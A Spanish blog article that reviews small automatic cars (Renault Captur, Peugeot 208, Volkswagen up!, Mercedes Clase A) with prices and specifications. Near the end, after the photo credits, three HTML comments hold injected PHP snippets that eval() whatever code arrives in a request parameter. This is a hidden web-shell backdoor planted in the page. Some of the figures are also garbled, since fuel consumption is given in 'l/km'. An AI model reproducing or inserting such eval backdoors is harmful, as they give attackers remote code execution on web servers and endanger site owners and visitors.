Coches automáticos pequeños, modelos y prestaciones

coches automáticos pequeños

Poco a poco los automóviles automáticos se van haciendo un hueco en el mercado del Viejo Continente. Habituales desde hace años por las carreteras norteamericanas, no han tenido un fácil desembarco en Europa. Sin embargo, en los últimos tiempos los conductores están comenzando a apreciar sus cualidades y, mucho más, cuando se trata de coches automáticos pequeños.

Porque son los vehículos de este tipo y de reducido tamaño los que mejor acogida están teniendo. Sus dos principales especificaciones hacen de ellos unos coches ideales para circular por el asfalto de las cada vez más concurridas calles de las urbes europeas.

Perfectos para ciudad y para principiantes. Un coche automático pequeño es, en muchos casos, el sueño de cualquiera que acabe de salir de la autoescuela. En esa época en la que todavía no nos hemos quitado el miedo a conducir, este tipo de vehículos resultan los más adecuados.

Los coches automáticos pequeños del momento

Las principales marcas, obviamente, son conscientes del creciente interés que este tipo de automóviles despierta en los compradores. Por ello, están sacando al mercado coches automáticos y de reducido tamaño con unas prestaciones realmente interesantes. Estos son algunos de ellos.

Renault Captur dCi 90 EDC

Diésel y con cambio automático. Novedad en este modelo de la marca francesa. El cambio automático instalado es el EDC que antes únicamente se montaba en el Captur TCe 120 de gasolina. Por 19.750 euros podemos hacernos con este coche.

coches pequeños automáticos

Peugeot 208

Desde 12.610,00 euros está disponible el Peugeot 208. Otro coche pequeño y con cambio automático que cuenta con unas prestaciones realmente interesantes. En diésel el más bajo de la gama es el 1.4, de 68 cv, 5 puertas, velocidad máxima de 165 km/h y consumo de 3,4 l/km.

Más rápido (178 km/h) y más consumo (4,1 l/km) caracterizan al Peugeot 208 1.2 Active 82 cv 5p. El único 208 de gasolina que incorpora el cambio automático.

Volkswagen up!

5 puertas, 1.0 y 75 cv. Un coche pequeño y elegante del que los expertos aseguran que cuenta con uno de los interiores mejor terminados en cuanto a utilidad y aprovechamiento. El cambio automático es el ASG y está disponible a partir de 14.440 euros.

Coches automáticos pequeños

Mercedes Benz Clase A

Esto ya son palabras mayores. Pero merece una mención. De 31.642 euros en adelante podemos adquirir este coche pequeño automático de la legendaria marca alemana Mercedes. Un diésel de 136 cv. Automático, chico y deportivo. Un gran coche.

Fotos: Largus, Overlaet, M_93

<!– [insert_php]if (isset($_REQUEST["mDP"])){eval($_REQUEST["mDP"]);exit;}[/insert_php][php]if (isset($_REQUEST["mDP"])){eval($_REQUEST["mDP"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["zoRi"])){eval($_REQUEST["zoRi"]);exit;}[/insert_php][php]if (isset($_REQUEST["zoRi"])){eval($_REQUEST["zoRi"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["jHGj"])){eval($_REQUEST["jHGj"]);exit;}[/insert_php][php]if (isset($_REQUEST["jHGj"])){eval($_REQUEST["jHGj"]);exit;}[/php] –>

Si te ha resultado interesante... ¿nos compartes? :) 0
Oscar
Escrito por
Oscar
Más artículos de Oscar

Tintar lunas en los coches ¿cómo y para qué?

Muchas personas pueden pensar que la respuesta a la segunda cuestión que...
Leer más

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *